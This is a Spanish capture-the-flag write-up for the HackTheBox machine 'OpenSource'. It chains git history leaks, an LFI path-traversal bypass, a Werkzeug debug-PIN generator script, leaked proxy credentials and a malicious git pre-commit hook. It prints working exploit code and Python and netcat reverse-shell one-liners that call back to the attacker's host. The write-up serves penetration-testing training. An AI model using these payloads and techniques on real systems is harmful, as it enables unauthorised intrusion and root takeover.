04-28-2022 13:45 00000000 .git/objects/52/ 127332 Defl:N 125725 1% 04-28-2022 13:45 1b23bbb8 .git/objects/52/1afc5be7274b71582d5518445cac3b56704391 0 Stored 0 0% 04-28-2022 13:46 00000000 .git/objects/c8/ 116 Stored 116 0% 04-28-2022 13:46 24c7f29c .git/objects/c8/6e16606492ba5ffe5386e2079e48d964d6e6e9 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/1a/ 274 Stored 274 0% 04-28-2022 13:45 b1a88a1d .git/objects/1a/a4e26b684800bd784b2ca8f3c062f1036dd015 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/96/ 48598 Defl:N 48608 0% 04-28-2022 13:45 c3a5094d .git/objects/96/333634a746368a1df7b655a3359ae16a41cd99 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/f2/ 341 Stored 341 0% 04-28-2022 13:55 4928a02f .git/objects/f2/744c6346a6a482f2a5b9926296f32f2e215e0a 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/3a/ 148 Stored 148 0% 04-28-2022 13:45 2bdc24c6 .git/objects/3a/c0f1cba62483bc4af5d2804a708d6ed02dba0a 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/objects/e6/ 15 Stored 15 0% 04-28-2022 13:45 98a4a0b4 .git/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391 23 Stored 23 0% 04-28-2022 14:50 abd3cf9e .git/HEAD 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/refs/ 0 Stored 0 0% 04-28-2022 13:55 00000000 .git/refs/heads/ 41 Stored 41 0% 04-28-2022 13:55 6f4bfaf1 .git/refs/heads/public 41 Stored 41 0% 04-28-2022 13:47 3f826e2b .git/refs/heads/dev 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/refs/tags/ 39 Stored 39 0% 04-28-2022 13:55 f1b92618 .git/COMMIT_EDITMSG 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/hooks/ 424 Defl:N 265 38% 04-28-2022 13:45 024cc0cf .git/hooks/pre-applypatch.sample 1348 Defl:N 669 50% 04-28-2022 13:45 b18fd804 .git/hooks/pre-push.sample 1492 Defl:N 744 50% 04-28-2022 13:45 303613ed .git/hooks/prepare-commit-msg.sample 4898 Defl:N 2015 59% 04-28-2022 13:45 5158ec84 .git/hooks/pre-rebase.sample 1638 Defl:N 905 45% 04-28-2022 13:45 2a671d12 .git/hooks/pre-commit.sample 478 Defl:N 279 42% 04-28-2022 13:45 09f84f85 .git/hooks/applypatch-msg.sample 416 Defl:N 255 39% 04-28-2022 13:45 5ef33f44 .git/hooks/pre-merge-commit.sample 896 Defl:N 503 44% 04-28-2022 13:45 10caf8e9 .git/hooks/commit-msg.sample 544 Defl:N 329 40% 04-28-2022 13:45 96f8c492 .git/hooks/pre-receive.sample 189 Defl:N 138 27% 04-28-2022 13:45 c0f70c9a .git/hooks/post-update.sample 3610 Defl:N 1141 68% 04-28-2022 13:45 2544211a .git/hooks/update.sample 3079 Defl:N 1463 53% 04-28-2022 13:45 8e0e04aa .git/hooks/fsmonitor-watchman.sample 5746 Defl:N 2509 56% 04-28-2022 14:50 4b79d9c0 .git/index 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/logs/ 1741 Defl:N 405 77% 04-28-2022 14:50 0c5febdd .git/logs/HEAD 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/logs/refs/ 0 Stored 0 0% 04-28-2022 13:45 00000000 .git/logs/refs/heads/ 497 Defl:N 204 59% 04-28-2022 13:55 4d35a674 .git/logs/refs/heads/public 581 Defl:N 233 60% 04-28-2022 13:47 b6e8e48d .git/logs/refs/heads/dev -------- ------- --- ------- 6204731 2440275 61% 248 files |
Además del código de la aplicación, también está el directorio .git donde podemos ver los cambios realizados sobre el código
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 |
$ git log --raw commit 2c67a52253c6fe1f206ad82ba747e43208e8cfd9 (HEAD -> public) Author: gituser <gituser@local> Date: Thu Apr 28 13:55:55 2022 +0200 clean up dockerfile for production use :100644 100644 76c7768 5b0553c M Dockerfile commit ee9d9f1ef9156c787d53074493e39ae364cd1e05 Author: gituser <gituser@local> Date: Thu Apr 28 13:45:17 2022 +0200 initial :000000 100644 0000000 76c7768 A Dockerfile :000000 100644 0000000 e69de29 A app/INSTALL.md :000000 100644 0000000 5c2ecc0 A app/app/__init__.py :000000 100644 0000000 877f291 A app/app/configuration.py :000000 100644 0000000 91e52af A app/app/static/css/style.css :000000 100644 0000000 b335ef9 A app/app/static/js/ie10-viewport-bug-workaround.js :000000 100644 0000000 401c744 A app/app/static/js/script.js :000000 100644 0000000 259a9e2 A app/app/static/vendor/bootstrap/css/bootstrap-grid.css :000000 100644 0000000 8661e3e A app/app/static/vendor/bootstrap/css/bootstrap-grid.css.map :000000 100644 0000000 6533f31 A app/app/static/vendor/bootstrap/css/bootstrap-grid.min.css :000000 100644 0000000 1b393db A app/app/static/vendor/bootstrap/css/bootstrap-grid.min.css.map :000000 100644 0000000 91b0fc4 A app/app/static/vendor/bootstrap/css/bootstrap-reboot.css :000000 100644 0000000 701f671 A app/app/static/vendor/bootstrap/css/bootstrap-reboot.css.map :000000 100644 0000000 5308df6 A app/app/static/vendor/bootstrap/css/bootstrap-reboot.min.css :000000 100644 0000000 b8551f7 A app/app/static/vendor/bootstrap/css/bootstrap-reboot.min.css.map :000000 100644 0000000 8eac957 A app/app/static/vendor/bootstrap/css/bootstrap.css :000000 100644 0000000 521afc5 A app/app/static/vendor/bootstrap/css/bootstrap.css.map :000000 100644 0000000 86b6845 A app/app/static/vendor/bootstrap/css/bootstrap.min.css :000000 100644 0000000 b939eb6 A app/app/static/vendor/bootstrap/css/bootstrap.min.css.map :000000 100644 0000000 5344522 A app/app/static/vendor/bootstrap/js/bootstrap.bundle.js :000000 100644 0000000 93cf73e A app/app/static/vendor/bootstrap/js/bootstrap.bundle.js.map :000000 100644 0000000 78c533b A app/app/static/vendor/bootstrap/js/bootstrap.bundle.min.js :000000 100644 0000000 54d2495 A app/app/static/vendor/bootstrap/js/bootstrap.bundle.min.js.map :000000 100644 0000000 f1e68d3 A app/app/static/vendor/bootstrap/js/bootstrap.js :000000 100644 0000000 e5f6ce9 A app/app/static/vendor/bootstrap/js/bootstrap.js.map :000000 100644 0000000 e5a2429 A app/app/static/vendor/bootstrap/js/bootstrap.min.js :000000 100644 0000000 757dbf3 A app/app/static/vendor/bootstrap/js/bootstrap.min.js.map :000000 100644 0000000 e1e271c A app/app/static/vendor/font-awesome/all.min.css :000000 100644 0000000 773ad95 A app/app/static/vendor/jquery/jquery-3.4.1.js :000000 100644 0000000 a1c07fd A app/app/static/vendor/jquery/jquery-3.4.1.min.js :000000 100644 0000000 e15edef A app/app/static/vendor/jquery/jquery-3.4.1.min.map :000000 100644 0000000 a88adb2 A app/app/static/vendor/popper/popper-utils.js :000000 100644 0000000 50e078a A app/app/static/vendor/popper/popper-utils.js.map :000000 100644 0000000 f6560a1 A app/app/static/vendor/popper/popper-utils.min.js :000000 100644 0000000 7fda3a9 A app/app/static/vendor/popper/popper-utils.min.js.map :000000 100644 0000000 7fa913d A app/app/static/vendor/popper/popper.js :000000 100644 0000000 d56fdda A app/app/static/vendor/popper/popper.js.flow :000000 100644 0000000 9633363 A app/app/static/vendor/popper/popper.js.map :000000 100644 0000000 8a17212 A app/app/static/vendor/popper/popper.min.js :000000 100644 0000000 7107f61 A app/app/static/vendor/popper/popper.min.js.map :000000 100644 0000000 29218c7 A app/app/templates/index.html :000000 100644 0000000 316cd1d A app/app/templates/success.html :000000 100644 0000000 fd19858 A app/app/templates/upload.html :000000 100644 0000000 eebf49d A app/app/utils.py :000000 100644 0000000 f2744c6 A app/app/views.py :000000 100644 0000000 b64e36b A app/run.py :000000 100755 0000000 1b76267 A build-docker.sh :000000 100644 0000000 a14dd36 A config/supervisord.conf |
Revisamos el cambio entre commits y encontramos un dato interesante
1 2 3 4 5 6 7 8 9 10 11 12 13 |
$ git diff ee9d9f1ef9156c787d53074493e39ae364cd1e05:Dockerfile HEAD:Dockerfile diff --git a/Dockerfile b/Dockerfile index 76c7768..5b0553c 100644 --- a/Dockerfile +++ b/Dockerfile @@ -29,7 +29,6 @@ ENV PYTHONDONTWRITEBYTECODE=1 # Set mode ENV MODE="PRODUCTION" -# ENV FLASK_DEBUG=1 # Run supervisord CMD ["/usr/bin/supervisord", "-c", "/etc/supervisord.conf"] |
El hecho de descomentar esa línea habilita la consola, así que vamos a ver si podemos conseguir ese PIN.
La consola muestra un PIN de 9 dígitos, cuyo formato será nnn-nnn-nnn
Consultando los enlaces de la web de Hacktricks que vismo antes es posible obtener dicho PIN siempre y cuando se pueda obtener previamente cierta información del objetivo.
Para ello se necesitan 6 piezas, 3 de ellas son públicas, 1 se filtra al estar en el modo debug, y las otras 2 son privadas y sería necesario obtener por medio de la explotación de otra vulnerabilidad tipo LFI para obtener los valores.
Revisando entonces el código los valores serían:
– username -> es el usuario que inició esta instancia de Flask
– modname -> siempre es flask.app
– getattr(app, ‘__name__’, getattr (app .__ class__, ‘__name__’)) es siempre Flask
– getattr(mod, ‘__file__’, None) es la ruta absoluta de app.py en el directorio de Flask; esto se filtra cuando causamos un error debido a que la aplicación está en modo debug.
– uuid.getnode() es la dirección MAC del servidor que solicita en forma decimal, se puede obtener del fichero /sys/class/net/{Iface}/address
– get_machine_id() es el valor en /etc/machine-id o /proc/sys/kernel/random/boot_id, también algo de material de /proc/self/cgroup. Esta última parte de la función no se incluyó en los informes para descifrar el PIN.
Conocidos todos los datos, el usuario lo sacamos del fichero de configuración de la aplicación:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
$ cat supervisord.conf [supervisord] user=root nodaemon=true logfile=/dev/null logfile_maxbytes=0 pidfile=/run/supervisord.pid [program:flask] command=python /app/run.py stdout_logfile=/dev/stdout stdout_logfile_maxbytes=0 stderr_logfile=/dev/stderr stderr_logfile_maxbytes=0 |
Para los dos últimos valores, la MAC y el id de máquina vamos a revisar el código fuente y encontramos una vulnerabilidad de LFI
Si analizamos el código anterior reemplaza el valor ../ por un valor vacío, pero que pasaría si probásemos con doble //, es decir, con ..//
Nos vamos a burp y lo probamos a ver si podemos explotar la vulnerabilidad
Y bingo, ya tenemos la mac mediante la explotación de LFI, ahora sólo nos queda obtener el resto de valores necesarios para generar nuestro PIN.
Con todos los valores obtenidos, cogemos el script de HackTricks y le hacemos algunas modificaciones, en el caso que indica la web se utiliza el cifrado md5, con el cual no pudimos hacer nada ya que sería para una versión más antigua de Werkzeug Debugger, así que modificamos el código para utilizar sha1 en su lugar, y quedaría tal que así
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 |
import hashlib from itertools import chain probably_public_bits = [ 'root',# username 'flask.app',# modname 'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__')) '/usr/local/lib/python3.10/site-packages/flask/app.py' # getattr(mod, '__file__', None), ] private_bits = [ '2485377892355',# str(uuid.getnode()), /sys/class/net/eth0/address convert hex to decimal # Machine Id: /etc/machine-id + /proc/sys/kernel/random/boot_id + /proc/self/cgroup 'd141de1b-e2ca-4316-977d-62af2d4d82f62ae8cbace0fec3078d07d2007f48826c76b560b98613869f13524dae42388e00' ] h = hashlib.sha1() for bit in chain(probably_public_bits, private_bits): if not bit: continue if isinstance(bit, str): bit = bit.encode('utf-8') h.update(bit) h.update(b'cookiesalt') cookie_name = '__wzd' + h.hexdigest()[:20] num = None if num is None: h.update(b'pinsalt') num = f"{int(h.hexdigest(), 16):09d}"[:9] rv =None if rv is None: for group_size in 5, 4, 3: if len(num) % group_size == 0: rv = '-'.join(num[x:x + group_size].rjust(group_size, '0') for x in range(0, len(num), group_size)) break else: rv = num print(rv) |
Con nuestro exploit terminado, lo ejecutamos
1 2 |
$ python3 werkzeug-exploy.py 111-667-210 |
Introducimos el PIN en la consola y ya tenemos acceso
Ahora que ya estamos en la consola, vamos a ejecutar el siguiente payload
1 |
import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.9",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh") |
Y automáticamente tendremos acceso a la máquina
1 2 3 4 5 6 |
$ nc -nlvp 4444 listening on [any] 4444 ... connect to [10.10.14.9] from (UNKNOWN) [10.10.11.164] 60540 /app # ^[[51;8Rid id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video) |
Bueno, una vez dentro nos fijamos en la máquina, y somos root, una shell mediocre y pocas cosas que hacer, evidentemente es un contenedor, así que vamos a buscar la forma de salir de él.
Recordamos el puerto filtrado anteriormente, el 3000, así que vamos a tratar de llegar al mismo utilizando chisel para hacer un forward del puerto hacia nuestra máquina local.
Nos descargaremos el cliente en nuestra máquina y en el contenedor y ejecutaremos el mismo en ambos lados.
En nuestro kali
1 |
$ ./chisel server -p 4445 --reverse |
Y en la máquina víctima
1 |
/tmp # ./chisel client 10.10.14.9:4445 R:3000:172.17.0.1:3000 |
Y boom, llegamos a un nuevo portal web en el puerto 3000
Se trata de gitea, un software opensource para el almacenamiento de repositorios git. Navegamos un poco por el portal, nos creamos una cuenta… pero nada, parece que no es el camino.
Volvemos a revisar el código git que obtuvimos anteriormente y descubrimos una cosa que antes pasamos por alto, hay otro branch.
1 2 3 |
$ git branch dev * public |
Así que vamos a cambiar de rama
1 |
$ git checkout dev |
Y revisamos los cambios entre las ramas
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 |
$ git log commit c41fedef2ec6df98735c11b2faf1e79ef492a0f3 (HEAD -> dev) Author: gituser <gituser@local> Date: Thu Apr 28 13:47:24 2022 +0200 ease testing commit be4da71987bbbc8fae7c961fb2de01ebd0be1997 Author: gituser <gituser@local> Date: Thu Apr 28 13:46:54 2022 +0200 added gitignore commit a76f8f75f7a4a12b706b0cf9c983796fa1985820 Author: gituser <gituser@local> Date: Thu Apr 28 13:46:16 2022 +0200 updated commit ee9d9f1ef9156c787d53074493e39ae364cd1e05 Author: gituser <gituser@local> Date: Thu Apr 28 13:45:17 2022 +0200 initial # miramos los cambios mas en detalle $ git log --raw commit c41fedef2ec6df98735c11b2faf1e79ef492a0f3 (HEAD -> dev) Author: gituser <gituser@local> Date: Thu Apr 28 13:47:24 2022 +0200 ease testing :100644 100644 76c7768 0875eda M Dockerfile commit be4da71987bbbc8fae7c961fb2de01ebd0be1997 Author: gituser <gituser@local> Date: Thu Apr 28 13:46:54 2022 +0200 added gitignore :000000 100644 0000000 e50a290 A .gitignore :100644 000000 5975e3f 0000000 D app/.vscode/settings.json commit a76f8f75f7a4a12b706b0cf9c983796fa1985820 Author: gituser <gituser@local> Date: Thu Apr 28 13:46:16 2022 +0200 updated :000000 100644 0000000 5975e3f A app/.vscode/settings.json :100644 100644 f2744c6 0f3cc37 M app/app/views.py commit ee9d9f1ef9156c787d53074493e39ae364cd1e05 Author: gituser <gituser@local> Date: Thu Apr 28 13:45:17 2022 +0200 initial :000000 100644 0000000 76c7768 A Dockerfile :000000 100644 0000000 e69de29 A app/INSTALL.md :000000 100644 0000000 5c2ecc0 A app/app/__init__.py :000000 100644 0000000 877f291 A app/app/configuration.py :000000 100644 0000000 91e52af A app/app/static/css/style.css :000000 100644 0000000 b335ef9 A app/app/static/js/ie10-viewport-bug-workaround.js :000000 100644 0000000 401c744 A app/app/static/js/script.js :000000 100644 0000000 259a9e2 A app/app/static/vendor/bootstrap/css/bootstrap-grid.css :000000 100644 0000000 8661e3e A app/app/static/vendor/bootstrap/css/bootstrap-grid.css.map :000000 100644 0000000 6533f31 A app/app/static/vendor/bootstrap/css/bootstrap-grid.min.css :000000 100644 0000000 1b393db A app/app/static/vendor/bootstrap/css/bootstrap-grid.min.css.map :000000 100644 0000000 91b0fc4 A app/app/static/vendor/bootstrap/css/bootstrap-reboot.css :000000 100644 0000000 701f671 A app/app/static/vendor/bootstrap/css/bootstrap-reboot.css.map :000000 100644 0000000 5308df6 A app/app/static/vendor/bootstrap/css/bootstrap-reboot.min.css :000000 100644 0000000 b8551f7 A app/app/static/vendor/bootstrap/css/bootstrap-reboot.min.css.map :000000 100644 0000000 8eac957 A app/app/static/vendor/bootstrap/css/bootstrap.css :000000 100644 0000000 521afc5 A app/app/static/vendor/bootstrap/css/bootstrap.css.map :000000 100644 0000000 86b6845 A app/app/static/vendor/bootstrap/css/bootstrap.min.css |
En concreto el cambio del fichero settings.json, así que revisamos las modificaciones realizadas
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 |
$ git diff a76f8f75f7a4a12b706b0cf9c983796fa1985820 be4da71987bbbc8fae7c961fb2de01ebd0be1997 diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..e50a290 --- /dev/null +++ b/.gitignore @@ -0,0 +1,26 @@ +.DS_Store +.env +.flaskenv +*.pyc +*.pyo +env/ +venv/ +.venv/ +env* +dist/ +build/ +*.egg +*.egg-info/ +_mailinglist +.tox/ +.cache/ +.pytest_cache/ +.idea/ +docs/_build/ +.vscode + +# Coverage reports +htmlcov/ +.coverage +.coverage.* +*,cover diff --git a/app/.vscode/settings.json b/app/.vscode/settings.json deleted file mode 100644 index 5975e3f..0000000 --- a/app/.vscode/settings.json +++ /dev/null @@ -1,5 +0,0 @@ -{ - "python.pythonPath": "/home/dev01/.virtualenvs/flask-app-b5GscEs_/bin/python", - "http.proxy": "http://dev01:Soulless_Developer#2022@10.10.10.128:5187/", - "http.proxyStrictSSL": false -} |
Y obtenemos un usuario y una contraseña que vamos a utilizar en el portal web
Revisamos el repositorio home-backup del usuario y vemos una clave ssh, así que vamos a descargar la misma
Obteniendo la flag de user
Como ya tenemos la clave ssh del usuario, accedemos utilizando la misma y conseguiremos acceso a la máquina y la flag de user
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
$ ssh -i dev01.pem dev01@10.10.11.164 The authenticity of host '10.10.11.164 (10.10.11.164)' can't be established. ED25519 key fingerprint is SHA256:LbyqaUq6KgLagQJpfh7gPPdQG/iA2K4KjYGj0k9BMXk. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.11.164' (ED25519) to the list of known hosts. Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-176-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Sat Jul 23 22:12:05 UTC 2022 System load: 0.1 Processes: 223 Usage of /: 75.8% of 3.48GB Users logged in: 0 Memory usage: 22% IP address for eth0: 10.10.11.164 Swap usage: 0% IP address for docker0: 172.17.0.1 16 updates can be applied immediately. 9 of these updates are standard security updates. To see these additional updates run: apt list --upgradable Last login: Mon May 16 13:13:33 2022 from 10.10.14.23 dev01@opensource:~$ id uid=1000(dev01) gid=1000(dev01) groups=1000(dev01) dev01@opensource:~$ cat user.txt 8xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx7 dev01@opensource:~$ |
Escalado de privilegios
El siguiente paso será root, revisamos la máquina un poco por encima pero no tenemos permisos de root con este usuario así que vamos a enumerar con linenum y pspy y observamos un proceso cronificado muy interesante
Cada poco tiempo se ejecuta un fichero git-sync con bash cuyo contenido es el siguiente
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
$ cat /usr/local/bin/git-sync #!/bin/bash cd /home/dev01/ if ! git status --porcelain; then echo "No changes" else day=$(date +'%Y-%m-%d') echo "Changes detected, pushing.." git add . git commit -m "Backup for ${day}" git push origin main fi |
El script detecta si hay cambios en el git de la home del usuario dev01 y si se da el caso, realiza un commit de los mismos, por lo que es una forma de poder escalar privilegios a root.
Revisamos el contenido del directorio .git del usuario y encontramos un texto interesante en el fichero /home/dev01/.git/hooks/pre-commit.sample
1 2 3 4 5 6 |
# An example hook script to verify what is about to be committed. # Called by "git commit" with no arguments. The hook should # exit with non-zero status after issuing an appropriate message if # it wants to stop the commit. # # To enable this hook, rename this file to "pre-commit". |
Así que vamos a hacerle caso, generamos un fichero llamado pre-commit en ese mismo directorio con una reverse shell
1 2 3 4 5 6 7 8 9 10 |
#!/bin/sh # # An example hook script to verify what is about to be committed. # Called by "git commit" with no arguments. The hook should # exit with non-zero status after issuing an appropriate message if # it wants to stop the commit. # # To enable this hook, rename this file to "pre-commit". rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 4444 >/tmp/f |
Y sólo nos queda esperar a que se ejecute de nuevo para conseguir una shell como root
1 2 3 4 5 6 |
$ nc -lvp 4444 listening on [any] 4444 ... connect to [10.10.14.9] from opensource.htb [10.10.11.164] 45276 /bin/sh: 0: can't access tty; job control turned off # id uid=0(root) gid=0(root) groups=0(root) |
Obteniendo la flag de root
Siendo ya root, sólo nos queda ir a la home de dicho usuario y coger nuestra flag
1 2 3 4 5 6 7 8 9 10 |
# cd /root # ls -l total 16 -rw-rw-r-- 1 dev01 dev01 269 May 2 23:43 config drwxr-xr-x 4 root root 4096 May 20 12:38 meta -rw-r----- 1 root root 33 Jul 23 21:12 root.txt drwx------ 3 root root 4096 May 4 16:35 snap c# at root.txt 6xxxxxxxxxxxxxxxxxxxxxxxxx9 # |
Y ya tenemos nuestra flag de root para completar esta máquina y conseguir nuestros puntos.
Si eres usuario de HackTheBox y te gustó mi writeup, por favor, dame respeto en el siguiente enlace